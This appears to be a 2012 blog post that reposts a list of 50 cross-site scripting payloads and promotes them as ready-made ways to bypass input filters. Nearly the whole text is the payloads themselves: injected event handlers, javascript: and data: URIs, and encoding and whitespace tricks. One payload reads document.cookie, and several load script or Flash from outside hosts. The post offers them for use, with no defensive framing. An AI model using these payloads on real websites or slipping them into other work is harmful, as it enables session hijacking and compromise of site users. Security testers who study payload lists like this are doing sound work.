Monday, 19 November 2012
50 Awesome XSS Vectors From @soaj1664ashar
Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. Can be quite useful for bypassing any filter with the help of these full baked vectors.
Or Grab from pastebin :)
50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)
1) <a href="javascript:\u0061le%72t(1)"><button>
2) <div onmouseover='alert(1)'>DIV</div>
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
4) <a href="jAvAsCrIpT:alert(1)">X</a>
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
7) <var onmouseover="prompt(1)">On Mouse Over</var>
8) <a href=javascript:alert(document.cookie)>Click Here</a>
9) <img src="/" =_=" title="onerror='prompt(1)'">
10) <%<!--'%><script>alert(1);</script -->
11) <script src="data:text/javascript,alert(1)"></script>
12) <iframe/src \/\/onload = prompt(1)
13) <iframe/onreadystatechange=alert(1)
14) <svg/onload=alert(1)
15) <input value=<><iframe/src=javascript:confirm(1)
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
17) http://www.<script>alert(1)</script .com
18) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
19) <svg><script ?>alert(1)
20) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
21) <img src=`xx:xx`onerror=alert(1)>
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
23) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
26) <svg contentScriptType=text/vbs><script>MsgBox+1
27) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
30) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
31) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
32) <object data=javascript:\u0061le%72t(1)>
33) <script>+-+-1-+-+alert(1)</script>
34) <body/onload=<!-->
alert(1)>
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
36) <img src ?itworksonchrome?\/onerror = alert(1)
37) <svg><script>//
confirm(1);</script </svg>
38) <svg><script onlypossibleinopera:-)> alert(1)
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
40) <script x> alert(1) </script 1=2
41) <div/onmouseover='alert(1)'> style="x:">
42) <--`<img/src=` onerror=alert(1)> --!>
43) <script/src=data:text/javascript,alert(1)></script>
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
45) "><img src=x onerror=window.open('https://www.google.com/');>
46) <form><button formaction=javascript:alert(1)>CLICKME
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
50) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
Or Grab from pastebin :)
Bookmark this post: | 
|
Subscribe to:
Post Comments (Atom)